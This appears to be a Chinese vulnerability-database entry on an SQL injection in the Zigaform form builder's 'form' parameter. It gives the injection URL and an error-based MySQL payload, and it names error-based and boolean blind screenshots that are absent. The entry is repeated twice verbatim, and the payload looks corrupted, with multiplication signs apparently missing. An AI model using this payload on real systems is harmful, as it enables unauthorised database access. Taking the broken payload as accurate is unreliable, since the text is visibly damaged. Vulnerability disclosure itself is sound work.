VULHUB ™

Zigaform的model_forms.php中的form参数带入SQL语句导致SQL注入 注入点： http://localhost/[PATH]/formbuilder/frontend/viewform/?form=[SQL] payload： AND (SELECT 2120 FROM(SELECT COUNT(),CONCAT(0x716a7a6271,(SELECT (ELT(2120=2120,1))),0x7171767071,FLOOR(RAND(0)2),md5(233))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) 报错注入如下：  布尔盲注如下： 

Zigaform的model_forms.php中的form参数带入SQL语句导致SQL注入 注入点： http://localhost/[PATH]/formbuilder/frontend/viewform/?form=[SQL] payload： AND (SELECT 2120 FROM(SELECT COUNT(),CONCAT(0x716a7a6271,(SELECT (ELT(2120=2120,1))),0x7171767071,FLOOR(RAND(0)2),md5(233))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) 报错注入如下：  布尔盲注如下：